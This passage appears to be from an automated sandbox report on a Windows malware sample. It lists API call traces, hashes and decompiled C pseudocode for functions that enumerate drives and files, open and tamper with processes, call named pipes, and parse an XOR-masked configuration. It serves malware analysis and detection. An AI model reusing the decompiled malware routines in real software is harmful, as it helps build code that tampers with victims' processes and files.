                                • Part of subcall function 010432FF: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,?,00000000,?,?,?,?,?,?,01023136,?), ref: 01043365
                                • Part of subcall function 010432FF: RegCloseKey.ADVAPI32(?,?,00000000,?,?,?,?,?,?,01023136,?,?,?), ref: 0104338F
                              • HeapFree.KERNEL32(00000000,?,?,?,?,?), ref: 0102CB7E
                                • Part of subcall function 0102C50B: memcpy.NTDLL(?,?,00000000,?,?,?,00000000), ref: 0102C52D
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: HeapQueryValue$AllocateCloseFreememcpy
                              • String ID:
                              • API String ID: 1301464996-0
                              • Opcode ID: 7e1419972fc4a3c2cc18db4b4fdab58e7cbddb5d29a877a94dae3e8c4941ca5a
                              • Instruction ID: 30deb8912fec09ddbe448a38ec189c3efa491e5a9ff74928f0de6960d5f3298d
                              • Opcode Fuzzy Hash: 7e1419972fc4a3c2cc18db4b4fdab58e7cbddb5d29a877a94dae3e8c4941ca5a
                              • Instruction Fuzzy Hash: 0411E3B6610312ABEB66DB58DED0EAEB7B8EB48310F100069F6829B251D7759D00EB50
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0103C8EB, Relevance: 1.3, APIs: 1, Instructions: 60COMMON
                              Download Yara Rule
                              APIs
                              • memcpy.NTDLL(01033C99,01050384,00000018,0102D760,04B38DBA,?,0102D760,04B38DBA,?,0102D760,04B38DBA,?,?,01033C99,?,0102D760), ref: 0103C9A0
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: memcpy
                              • String ID:
                              • API String ID: 3510742995-0
                              • Opcode ID: f45e91cade216a269203423038fcb4043f18161ac17b25ba0e6fe377a8960555
                              • Instruction ID: 9dd244d0e5ab054d9cd4412cde0369243f86bfd6135d0809d95b694f8f4f3d6b
                              • Opcode Fuzzy Hash: f45e91cade216a269203423038fcb4043f18161ac17b25ba0e6fe377a8960555
                              • Instruction Fuzzy Hash: 8A119076200208ABD760DF59E845CAB3BACFBC0350B04C0A7B9C9DB15EEA366400DB50
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0102311B, Relevance: 1.3, APIs: 1, Instructions: 50memoryCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 010432FF: RegQueryValueExA.KERNELBASE(?,?,00000000,?,00000000,?,?,00000000,?,?,?,?,?,?,01023136,?), ref: 01043337
                                • Part of subcall function 010432FF: RtlAllocateHeap.NTDLL(00000000,?), ref: 0104334B
                                • Part of subcall function 010432FF: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,?,00000000,?,?,?,?,?,?,01023136,?), ref: 01043365
                                • Part of subcall function 010432FF: RegCloseKey.ADVAPI32(?,?,00000000,?,?,?,?,?,?,01023136,?,?,?), ref: 0104338F
                              • HeapFree.KERNEL32(00000000,?,?,?,?,?,?), ref: 0102318C
                                • Part of subcall function 0102881B: StrChrA.SHLWAPI(?,0000002E,00000000,?,?,00000000,01023177,00000000,?,00000000,?,?,?,?,?,?), ref: 0102882D
                                • Part of subcall function 0102881B: StrChrA.SHLWAPI(?,00000020,?,00000000,01023177,00000000,?,00000000,?,?,?,?,?,?), ref: 0102883C
                                • Part of subcall function 0102AF6F: CloseHandle.KERNEL32(?,00000000,?,00000000), ref: 0102AF95
                                • Part of subcall function 0102AF6F: CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 0102AFA1
                                • Part of subcall function 0102AF6F: GetModuleHandleA.KERNEL32(?,04B396FC,00000000,?,00000000), ref: 0102AFC1
                                • Part of subcall function 0102AF6F: GetProcAddress.KERNEL32(00000000), ref: 0102AFC8
                                • Part of subcall function 0102AF6F: Thread32First.KERNEL32(?,0000001C), ref: 0102AFD8
                                • Part of subcall function 0102AF6F: CloseHandle.KERNEL32(?), ref: 0102B020
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: CloseHandle$HeapQueryValue$AddressAllocateCreateFirstFreeModuleProcSnapshotThread32Toolhelp32
                              • String ID:
                              • API String ID: 2627809124-0
                              • Opcode ID: 0922d701ef2f5ccd0ea6820d7192c7ec811ac34e1a996d3a05b7d3a961c6ec92
                              • Instruction ID: faa38fd42228b761f7686763daefac523cd392d394321e748231b00ca44af38c
                              • Opcode Fuzzy Hash: 0922d701ef2f5ccd0ea6820d7192c7ec811ac34e1a996d3a05b7d3a961c6ec92
                              • Instruction Fuzzy Hash: BE018FB5610225BFDB21DBA8DE84C9FBBFCEB083487100055F485A3104DA7AAE01C765
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 01032E8A, Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 010432FF: RegQueryValueExA.KERNELBASE(?,?,00000000,?,00000000,?,?,00000000,?,?,?,?,?,?,01023136,?), ref: 01043337
                                • Part of subcall function 010432FF: RtlAllocateHeap.NTDLL(00000000,?), ref: 0104334B
                                • Part of subcall function 010432FF: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,?,00000000,?,?,?,?,?,?,01023136,?), ref: 01043365
                                • Part of subcall function 010432FF: RegCloseKey.ADVAPI32(?,?,00000000,?,?,?,?,?,?,01023136,?,?,?), ref: 0104338F
                              • HeapFree.KERNEL32(00000000,?,?,?,?,?), ref: 01032F00
                                • Part of subcall function 0102881B: StrChrA.SHLWAPI(?,0000002E,00000000,?,?,00000000,01023177,00000000,?,00000000,?,?,?,?,?,?), ref: 0102882D
                                • Part of subcall function 0102881B: StrChrA.SHLWAPI(?,00000020,?,00000000,01023177,00000000,?,00000000,?,?,?,?,?,?), ref: 0102883C
                                • Part of subcall function 0102FD22: lstrlen.KERNEL32(?,?,00000000,00000000,0103D9EF,00000011,?,00000001,00000000,?,-00000008), ref: 0102FD52
                                • Part of subcall function 0102FD22: RtlAllocateHeap.NTDLL(00000000,-00000008,?), ref: 0102FD68
                                • Part of subcall function 0102FD22: memcpy.NTDLL(00000010,?,00000000), ref: 0102FD9E
                                • Part of subcall function 0102FD22: memcpy.NTDLL(00000010,00000000,?), ref: 0102FDB9
                                • Part of subcall function 0102FD22: CallNamedPipeA.KERNEL32(00000000,-00000008,?,00000010,00000028,00000001), ref: 0102FDD7
                                • Part of subcall function 0102FD22: GetLastError.KERNEL32 ref: 0102FDE1
                                • Part of subcall function 0102FD22: HeapFree.KERNEL32(00000000,00000000), ref: 0102FE04
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: Heap$AllocateFreeQueryValuememcpy$CallCloseErrorLastNamedPipelstrlen
                              • String ID:
                              • API String ID: 730886825-0
                              • Opcode ID: 74318500c932422c2121d208cd182cd67229e7b2236f6119a10d97ae0abf50de
                              • Instruction ID: 1e4058fd26b914bce20dd80c45a573ea69fb7e3666b9c46d18972d69f5faa46d
                              • Opcode Fuzzy Hash: 74318500c932422c2121d208cd182cd67229e7b2236f6119a10d97ae0abf50de
                              • Instruction Fuzzy Hash: 2601DF35610316BBDB22DB98DE49FDF7BFCEB48710F000095FA81A3184DA75AA00DB66
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 01026C21, Relevance: 1.3, APIs: 1, Instructions: 45COMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0103032D: RtlAllocateHeap.NTDLL(00000000,?,010424D0), ref: 01030339
                              • memset.NTDLL ref: 01026C3F
                                • Part of subcall function 0102EA7F: memset.NTDLL ref: 0102EAA5
                                • Part of subcall function 0102EA7F: memcpy.NTDLL ref: 0102EACD
                                • Part of subcall function 0102EA7F: GetLastError.KERNEL32(00000010,00000218,01048D4D,00000100,?,00000318,00000008), ref: 0102EAE4
                                • Part of subcall function 0102EA7F: GetLastError.KERNEL32(00000010,?,00000000,00000318,?,?,?,?,?,?,?,?,00000010,00000218,01048D4D,00000100), ref: 0102EBC7
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: ErrorLastmemset$AllocateHeapmemcpy
                              • String ID:
                              • API String ID: 4290293647-0
                              • Opcode ID: d8533d3d08c0517174644d401a62b8cab4e08e5ea25ea6f1217ef60ddb04f65b
                              • Instruction ID: a747439dc4cb0f96153e116e58e94de4351d907e914ae1f0ac0f1a3c2f51a95e
                              • Opcode Fuzzy Hash: d8533d3d08c0517174644d401a62b8cab4e08e5ea25ea6f1217ef60ddb04f65b
                              • Instruction Fuzzy Hash: 8F01A27190132D6BD722AF29D880BAF7BECEB55214F108625FDC497241D772D91487A1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 013E4FA0, Relevance: 1.3, APIs: 1, Instructions: 26stringCOMMON
                              Download Yara Rule
                              C-Code - Quality: 100%
                              			E013E4FA0(intOrPtr _a4, intOrPtr _a8, void* _a12, intOrPtr _a16, WCHAR* _a20) {
				void* _t17;

				if(_a4 == 0) {
					L2:
					return E013E88FF(_a8, 1, _a12, _a16, _a20, lstrlenW(_a20) + _t14 + 2);
				}
				_t17 = E013E262B(_a4, _a8, _a12, _a16, _a20); // executed
				if(_t17 != 0) {
					goto L2;
				}
				return _t17;
			}




                              0x013e4fa8
                              0x013e4fc2
                              0x00000000
                              0x013e4fde
                              0x013e4fb9
                              0x013e4fc0
                              0x00000000
                              0x00000000
                              0x013e4fe5

                              APIs
                              • lstrlenW.KERNEL32(?,?,?,013E4AAE,3D013EC0,80000002,013E6096,013EA6E1,74666F53,4D4C4B48,013EA6E1,?,3D013EC0,80000002,013E6096,?), ref: 013E4FC5
                                • Part of subcall function 013E262B: SysAllocString.OLEAUT32(013EA6E1), ref: 013E2645
                                • Part of subcall function 013E262B: SysFreeString.OLEAUT32(00000000), ref: 013E2685
                              Memory Dump Source
                              • Source File: 00000000.00000002.655495954.00000000013E1000.00000020.00020000.sdmp, Offset: 013E0000, based on PE: true
                              • Associated: 00000000.00000002.655418004.00000000013E0000.00000004.00020000.sdmp Download File
                              • Associated: 00000000.00000002.655701530.00000000013EC000.00000002.00020000.sdmp Download File
                              • Associated: 00000000.00000002.655806217.00000000013ED000.00000004.00020000.sdmp Download File
                              • Associated: 00000000.00000002.655861835.00000000013EF000.00000002.00020000.sdmp Download File
                              Similarity
                              • API ID: String$AllocFreelstrlen
                              • String ID:
                              • API String ID: 3808004451-0
                              • Opcode ID: 7b022f41b4435c2f3eb5caa5ce0ef71f9bed7a67e1e1a8354cb8913d5d2021b7
                              • Instruction ID: d21f1fde2d26f6346de6b6eff58023972a2a31d2788f7f90a5da9a9ac489bca2
                              • Opcode Fuzzy Hash: 7b022f41b4435c2f3eb5caa5ce0ef71f9bed7a67e1e1a8354cb8913d5d2021b7
                              • Instruction Fuzzy Hash: CDF0923200421EBFDF125F94EC09E9A3FAAEF18754F048114FA04540A0DB72C9B1EBA0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 013E6A16, Relevance: 1.3, APIs: 1, Instructions: 23COMMON
                              Download Yara Rule
                              C-Code - Quality: 100%
                              			E013E6A16(void* __edi, void* _a4) {
				int _t7;
				int _t12;

				_t7 = E013E60DD(__edi, _a4,  &_a4); // executed
				_t12 = _t7;
				if(_t12 != 0) {
					memcpy(__edi, _a4, _t12);
					 *((char*)(__edi + _t12)) = 0;
					E013E6DFA(_a4);
				}
				return _t12;
			}





                              0x013e6a22
                              0x013e6a27
                              0x013e6a2b
                              0x013e6a32
                              0x013e6a3d
                              0x013e6a41
                              0x013e6a41
                              0x013e6a4a

                              APIs
                                • Part of subcall function 013E60DD: memcpy.NTDLL(00000000,00000110,?,?,?,00000008), ref: 013E6113
                                • Part of subcall function 013E60DD: memset.NTDLL ref: 013E6188
                                • Part of subcall function 013E60DD: memset.NTDLL ref: 013E619C
                              • memcpy.NTDLL(?,?,00000000,?,?,?,?,?,013E5BE3,?,?,013E512B,00000002,?,?,?), ref: 013E6A32
                                • Part of subcall function 013E6DFA: RtlFreeHeap.NTDLL(00000000,00000000,013E55CD,00000000,?,?,00000000), ref: 013E6E06
                              Memory Dump Source
                              • Source File: 00000000.00000002.655495954.00000000013E1000.00000020.00020000.sdmp, Offset: 013E0000, based on PE: true
                              • Associated: 00000000.00000002.655418004.00000000013E0000.00000004.00020000.sdmp Download File
                              • Associated: 00000000.00000002.655701530.00000000013EC000.00000002.00020000.sdmp Download File
                              • Associated: 00000000.00000002.655806217.00000000013ED000.00000004.00020000.sdmp Download File
                              • Associated: 00000000.00000002.655861835.00000000013EF000.00000002.00020000.sdmp Download File
                              Similarity
                              • API ID: memcpymemset$FreeHeap
                              • String ID:
                              • API String ID: 3053036209-0
                              • Opcode ID: 1de2f2b2d369184cfa0738fd9f5a90c1c0e5296654ede8fae6ba90d5d4c21a8e
                              • Instruction ID: 70c5cd4e30be0689c5ca4e9b6f18b4ce62defac426fe08d83e881dadefe77170
                              • Opcode Fuzzy Hash: 1de2f2b2d369184cfa0738fd9f5a90c1c0e5296654ede8fae6ba90d5d4c21a8e
                              • Instruction Fuzzy Hash: 21E086B6400339B7C7122A99DC05DEB7FACCF61594F044020FE0856141D632C95093E1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 01022E31, Relevance: 1.3, APIs: 1, Instructions: 19COMMON
                              Download Yara Rule
                              APIs
                              • memset.NTDLL ref: 01022E3B
                                • Part of subcall function 0103D058: RegOpenKeyExA.KERNELBASE(01022E53,00000000,00000000,00020119,80000001,?,?,00000000,?,?,?,01022E53,80000001), ref: 0103D09F
                                • Part of subcall function 0103D058: RegOpenKeyExA.ADVAPI32(01022E53,01022E53,00000000,00020019,80000001,?,?,00000000,?,?,?,01022E53,80000001), ref: 0103D0B5
                                • Part of subcall function 0103D058: RegCloseKey.ADVAPI32(80000001,80000001,?,?,80000001,?,?,00000000,?,?,?,01022E53,80000001), ref: 0103D0FE
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: Open$Closememset
                              • String ID:
                              • API String ID: 1685373161-0
                              • Opcode ID: 898731edf258f07b5705594c62e6b3be3d8b821792af44caa82211b383a9c5a1
                              • Instruction ID: 62dd4c74ce8f629f4596a38f83748e5412f8b50725bf1f9141a83f0464530edc
                              • Opcode Fuzzy Hash: 898731edf258f07b5705594c62e6b3be3d8b821792af44caa82211b383a9c5a1
                              • Instruction Fuzzy Hash: 10E0C23024010CBBDB00AE84DC81FD8B75DDF60780F408014FE4C1E282DA31E664CB95
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 01043589, Relevance: 1.3, APIs: 1, Instructions: 14COMMON
                              Download Yara Rule
                              APIs
                              • VirtualFree.KERNELBASE(?,00000000,00008000,00000010,?,?,?,0104C5B8,0000002C,0103656E,04B38DBA,?,00000000,0102EAB2,?,00000318), ref: 010435A3
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: FreeVirtual
                              • String ID:
                              • API String ID: 1263568516-0
                              • Opcode ID: e86c1a3550fc8848efccfbc700fd6f2b3f7a49cc3fca69b6f6f0572162bd4f90
                              • Instruction ID: 0ac4d8a684dd6f4becd0ed98497a7e171e921c7b098d1813c356e8c0809e178c
                              • Opcode Fuzzy Hash: e86c1a3550fc8848efccfbc700fd6f2b3f7a49cc3fca69b6f6f0572162bd4f90
                              • Instruction Fuzzy Hash: B7D01734E01629DBDB219F98D98599FFBB0BF18720F608224F5A0771A0C7301951CFD0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Non-executed Functions

                              Function 0103F63F, Relevance: 28.7, APIs: 19, Instructions: 233stringfilesynchronizationCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0103032D: RtlAllocateHeap.NTDLL(00000000,?,010424D0), ref: 01030339
                                • Part of subcall function 01026285: ExpandEnvironmentStringsW.KERNEL32(010334DD,00000000,00000000,00000001,00000000,00000000,0102EFEF,010334DD,00000000,0102EFEF,00000020), ref: 0102629C
                                • Part of subcall function 01026285: ExpandEnvironmentStringsW.KERNEL32(010334DD,00000000,00000000,00000000), ref: 010262B6
                              • lstrlenW.KERNEL32(?,00000000,747869A0,?,00000250,?,00000000), ref: 0103F68B
                              • lstrlenW.KERNEL32(?,?,00000000), ref: 0103F697
                              • memset.NTDLL ref: 0103F6DF
                              • FindFirstFileW.KERNEL32(00000000,00000000), ref: 0103F6FA
                              • lstrlenW.KERNEL32(0000002C), ref: 0103F732
                              • lstrlenW.KERNEL32(?), ref: 0103F73A
                              • memset.NTDLL ref: 0103F75D
                              • wcscpy.NTDLL ref: 0103F76F
                              • PathFindFileNameW.SHLWAPI(0000001C,?,?,?,?,00000000), ref: 0103F795
                              • RtlEnterCriticalSection.NTDLL(?), ref: 0103F7CA
                                • Part of subcall function 010469F0: RtlFreeHeap.NTDLL(00000000,?,010262C2,00000000), ref: 010469FC
                              • RtlLeaveCriticalSection.NTDLL(?), ref: 0103F7E6
                              • FindNextFileW.KERNEL32(?,00000000), ref: 0103F7FF
                              • WaitForSingleObject.KERNEL32(00000000), ref: 0103F811
                              • FindClose.KERNEL32(?), ref: 0103F826
                              • FindFirstFileW.KERNEL32(00000000,00000000), ref: 0103F83A
                              • lstrlenW.KERNEL32(0000002C), ref: 0103F85C
                              • FindNextFileW.KERNEL32(?,00000000), ref: 0103F8D2
                              • WaitForSingleObject.KERNEL32(00000000), ref: 0103F8E4
                              • FindClose.KERNEL32(?), ref: 0103F8FF
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: Find$Filelstrlen$CloseCriticalEnvironmentExpandFirstHeapNextObjectSectionSingleStringsWaitmemset$AllocateEnterFreeLeaveNamePathwcscpy
                              • String ID:
                              • API String ID: 2962561936-0
                              • Opcode ID: 4916f74b12e85ef8cb74320debae14bdfc777896beb01d4fbc0a7dbe10177f08
                              • Instruction ID: 89e416eef16ca0ff26c41ed1cd56633cb2ba4552e6fb232ee48d65cfcc4224ba
                              • Opcode Fuzzy Hash: 4916f74b12e85ef8cb74320debae14bdfc777896beb01d4fbc0a7dbe10177f08
                              • Instruction Fuzzy Hash: 6281ACB1904306AFD761AF28DD84B1BBBEDFF88304F004869FAD596262D775D804CB52
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 010460F4, Relevance: 18.5, APIs: 12, Instructions: 488memoryCOMMON
                              Download Yara Rule
                              APIs
                              • StrToIntExA.SHLWAPI(00000000,00000000,00000000,00000001,00000000,74784D40,?,010394CE,00000000,00000000,01024FAB,?,00000000), ref: 0104612C
                              • StrToIntExA.SHLWAPI(00000000,00000000,00000000,00000001,00000000,74784D40,?,010394CE,00000000,00000000,01024FAB,?,00000000), ref: 0104615E
                              • StrToIntExA.SHLWAPI(00000000,00000000,00000000,00000001,00000000,74784D40,?,010394CE,00000000,00000000,01024FAB,?,00000000), ref: 01046190
                              • StrToIntExA.SHLWAPI(00000000,00000000,00000000,00000001,00000000,74784D40,?,010394CE,00000000,00000000,01024FAB,?,00000000), ref: 010461C2
                              • StrToIntExA.SHLWAPI(00000000,00000000,00000000,00000001,00000000,74784D40,?,010394CE,00000000,00000000,01024FAB,?,00000000), ref: 010461F4
                              • StrToIntExA.SHLWAPI(00000000,00000000,00000000,00000001,00000000,74784D40,?,010394CE,00000000,00000000,01024FAB,?,00000000), ref: 01046226
                              • StrToIntExA.SHLWAPI(00000000,00000000,00000000,00000001,00000000,74784D40,?,010394CE,00000000,00000000,01024FAB,?,00000000), ref: 01046258
                              • StrToIntExA.SHLWAPI(00000000,00000000,00000000,00000001,00000000,74784D40,?,010394CE,00000000,00000000,01024FAB,?,00000000), ref: 0104628A
                              • StrToIntExA.SHLWAPI(00000000,00000000,00000000,00000001,00000000,74784D40,?,010394CE,00000000,00000000,01024FAB,?,00000000), ref: 010462BC
                              • HeapFree.KERNEL32(00000000,?,?,?,00000000,00000001,00000000,74784D40,?,010394CE,00000000,00000000,01024FAB,?,00000000), ref: 0104644B
                                • Part of subcall function 01039FCB: RtlEnterCriticalSection.NTDLL(04B3C0A0), ref: 01039FD4
                                • Part of subcall function 01039FCB: HeapFree.KERNEL32(00000000,?,?,010394CE,00000000,00000000,01024FAB,?,00000000), ref: 0103A006
                                • Part of subcall function 01039FCB: RtlLeaveCriticalSection.NTDLL(04B3C0A0), ref: 0103A024
                              • HeapFree.KERNEL32(00000000,010394CE,?,010394CE,00000000,00000001,00000000,74784D40,?,010394CE,00000000,00000000,01024FAB,?,00000000), ref: 0104648F
                              • StrToIntExA.SHLWAPI(00000000,00000000,00000000,?,010394CE,00000000,00000001,00000000,74784D40,?,010394CE,00000000,00000000,01024FAB,?,00000000), ref: 010464E1
                                • Part of subcall function 0103A53E: lstrlen.KERNEL32(0104F072,04B3C0DC,0104F072,00000000,0103F629), ref: 0103A547
                                • Part of subcall function 0103A53E: memcpy.NTDLL(00000000,?,00000000,00000001), ref: 0103A56A
                                • Part of subcall function 0103A53E: memset.NTDLL ref: 0103A579
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: FreeHeap$CriticalSection$EnterLeavelstrlenmemcpymemset
                              • String ID:
                              • API String ID: 2064646876-0
                              • Opcode ID: cc68ef5b7b7977775ade9e2cd52f944376db50d26b891673008f8d0a207c1129
                              • Instruction ID: 8819037e4a077731a9e3fbedab7b732ec7f85eb9a8bb9c32d792bc29f61b2fc3
                              • Opcode Fuzzy Hash: cc68ef5b7b7977775ade9e2cd52f944376db50d26b891673008f8d0a207c1129
                              • Instruction Fuzzy Hash: 62F1F6F0A00612ABDB61EB7CDDC499F77E9AB89740B244871B9C5D7208FA37DA01C790
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0102B8F7, Relevance: 16.6, APIs: 11, Instructions: 130libraryloadernativeCOMMON
                              Download Yara Rule
                              APIs
                              • OpenProcess.KERNEL32(001F0FFF,00000000,?,00000000,69B25F44,00000000,?,?,01025D62,?,00000000,?), ref: 0102B92A
                              • GetLastError.KERNEL32(?,?,01025D62,?,00000000,?), ref: 0102B938
                              • NtSetInformationProcess.NTDLL ref: 0102B992
                              • GetProcAddress.KERNEL32(?,00000000), ref: 0102B9D1
                              • GetProcAddress.KERNEL32(?), ref: 0102B9F2
                              • TerminateThread.KERNEL32(?,00000000,?,00000004,00000000), ref: 0102BA49
                              • CloseHandle.KERNEL32(?), ref: 0102BA5F
                              • CloseHandle.KERNEL32(?), ref: 0102BA85
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: AddressCloseHandleProcProcess$ErrorInformationLastOpenTerminateThread
                              • String ID:
                              • API String ID: 3529370251-0
                              • Opcode ID: 7e67882b7746db8f9257730df2af452fe9b62986f2cba7e852315cb8c4d98d55
                              • Instruction ID: d857f776845a0a273aeb44c7c3359aae7130989737c7f06a0947dc8e02b0a3c2
                              • Opcode Fuzzy Hash: 7e67882b7746db8f9257730df2af452fe9b62986f2cba7e852315cb8c4d98d55
                              • Instruction Fuzzy Hash: 18418EB1608315EFDB21DF25D984A5FBBE8FB88349F000A29F5D5D2160D776CA48CB52
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0103E230, Relevance: 16.6, APIs: 11, Instructions: 94memorystringsynchronizationCOMMON
                              Download Yara Rule
                              APIs
                              • wcscpy.NTDLL ref: 0103E264
                              • GetLogicalDriveStringsW.KERNEL32(00000000,00000000), ref: 0103E270
                              • RtlAllocateHeap.NTDLL(00000000,?), ref: 0103E281
                              • memset.NTDLL ref: 0103E29E
                              • GetLogicalDriveStringsW.KERNEL32(?,?), ref: 0103E2AC
                              • WaitForSingleObject.KERNEL32(00000000), ref: 0103E2BA
                              • GetDriveTypeW.KERNEL32(?), ref: 0103E2C8
                              • lstrlenW.KERNEL32(?), ref: 0103E2D4
                              • wcscpy.NTDLL ref: 0103E2E6
                              • lstrlenW.KERNEL32(?), ref: 0103E300
                              • HeapFree.KERNEL32(00000000,?), ref: 0103E319
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: Drive$HeapLogicalStringslstrlenwcscpy$AllocateFreeObjectSingleTypeWaitmemset
                              • String ID:
                              • API String ID: 3888849384-0
                              • Opcode ID: 851d47454e3eb36ff6765709ccdbd4d19f937bf3e7837d5986c82d858a840c39
                              • Instruction ID: a8f3849dd10a3c5a4b1f7ec4b8ba4ce0c4786616463474a083af4a63f42a4a56
                              • Opcode Fuzzy Hash: 851d47454e3eb36ff6765709ccdbd4d19f937bf3e7837d5986c82d858a840c39
                              • Instruction Fuzzy Hash: 66314876900119FFCB21ABA5DD88CDEBBBDFF49360B108055F185E3024D73AAA01DBA0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 013E294D, Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 258memoryCOMMONCrypto
                              Download Yara Rule
                              C-Code - Quality: 93%
                              			E013E294D(void* __ebx, int* __ecx, void* __edi, void* __esi) {
				int _v8;
				void* _v12;
				void* _v16;
				signed int _t28;
				signed int _t33;
				signed int _t39;
				char* _t45;
				char* _t46;
				char* _t47;
				char* _t48;
				char* _t49;
				char* _t50;
				void* _t51;
				void* _t52;
				void* _t53;
				intOrPtr _t54;
				void* _t56;
				intOrPtr _t57;
				intOrPtr _t58;
				signed int _t61;
				intOrPtr _t64;
				signed int _t65;
				signed int _t70;
				void* _t72;
				void* _t73;
				signed int _t75;
				signed int _t78;
				signed int _t82;
				signed int _t86;
				signed int _t90;
				signed int _t94;
				signed int _t98;
				void* _t101;
				void* _t102;
				void* _t115;
				void* _t118;
				intOrPtr _t121;

				_t118 = __esi;
				_t115 = __edi;
				_t104 = __ecx;
				_t101 = __ebx;
				_t28 =  *0x13ed2b4; // 0x69b25f44
				if(E013E5740( &_v8,  &_v12, _t28 ^ 0x889a0120) != 0 && _v12 >= 0x110) {
					 *0x13ed308 = _v8;
				}
				_t33 =  *0x13ed2b4; // 0x69b25f44
				if(E013E5740( &_v16,  &_v12, _t33 ^ 0x0159e6c7) == 0) {
					_v12 = 2;
					L69:
					return _v12;
				}
				_t39 =  *0x13ed2b4; // 0x69b25f44
				_push(_t115);
				if(E013E5740( &_v12,  &_v8, _t39 ^ 0xe60382a5) == 0) {
					L67:
					HeapFree( *0x13ed270, 0, _v16);
					goto L69;
				} else {
					_push(_t101);
					_t102 = _v12;
					if(_t102 == 0) {
						_t45 = 0;
					} else {
						_t98 =  *0x13ed2b4; // 0x69b25f44
						_t45 = E013E4F59(_t104, _t102, _t98 ^ 0x7895433b);
					}
					_push(_t118);
					if(_t45 != 0) {
						_t104 =  &_v8;
						if(StrToIntExA(_t45, 0,  &_v8) != 0) {
							 *0x13ed278 = _v8;
						}
					}
					if(_t102 == 0) {
						_t46 = 0;
					} else {
						_t94 =  *0x13ed2b4; // 0x69b25f44
						_t46 = E013E4F59(_t104, _t102, _t94 ^ 0x219b08c7);
					}
					if(_t46 != 0) {
						_t104 =  &_v8;
						if(StrToIntExA(_t46, 0,  &_v8) != 0) {
							 *0x13ed27c = _v8;
						}
					}
					if(_t102 == 0) {
						_t47 = 0;
					} else {
						_t90 =  *0x13ed2b4; // 0x69b25f44
						_t47 = E013E4F59(_t104, _t102, _t90 ^ 0x31fc0661);
					}
					if(_t47 != 0) {
						_t104 =  &_v8;
						if(StrToIntExA(_t47, 0,  &_v8) != 0) {
							 *0x13ed280 = _v8;
						}
					}
					if(_t102 == 0) {
						_t48 = 0;
					} else {
						_t86 =  *0x13ed2b4; // 0x69b25f44
						_t48 = E013E4F59(_t104, _t102, _t86 ^ 0x0cd926ce);
					}
					if(_t48 != 0) {
						_t104 =  &_v8;
						if(StrToIntExA(_t48, 0,  &_v8) != 0) {
							 *0x13ed004 = _v8;
						}
					}
					if(_t102 == 0) {
						_t49 = 0;
					} else {
						_t82 =  *0x13ed2b4; // 0x69b25f44
						_t49 = E013E4F59(_t104, _t102, _t82 ^ 0x3cd8b2cb);
					}
					if(_t49 != 0) {
						_t104 =  &_v8;
						if(StrToIntExA(_t49, 0,  &_v8) != 0) {
							 *0x13ed02c = _v8;
						}
					}
					if(_t102 == 0) {
						_t50 = 0;
					} else {
						_t78 =  *0x13ed2b4; // 0x69b25f44
						_t50 = E013E4F59(_t104, _t102, _t78 ^ 0x2878b929);
					}
					if(_t50 == 0) {
						L41:
						 *0x13ed284 = 5;
						goto L42;
					} else {
						_t104 =  &_v8;
						if(StrToIntExA(_t50, 0,  &_v8) == 0 || _v8 == 0) {
							goto L41;
						} else {
							L42:
							if(_t102 == 0) {
								_t51 = 0;
							} else {
								_t75 =  *0x13ed2b4; // 0x69b25f44
								_t51 = E013E4F59(_t104, _t102, _t75 ^ 0x261a367a);
							}
							if(_t51 != 0) {
								_push(_t51);
								_t72 = 0x10;
								_t73 = E013E2C74(_t72);
								if(_t73 != 0) {
									_push(_t73);
									E013E4D70();
								}
							}
							if(_t102 == 0) {
								_t52 = 0;
							} else {
								_t70 =  *0x13ed2b4; // 0x69b25f44
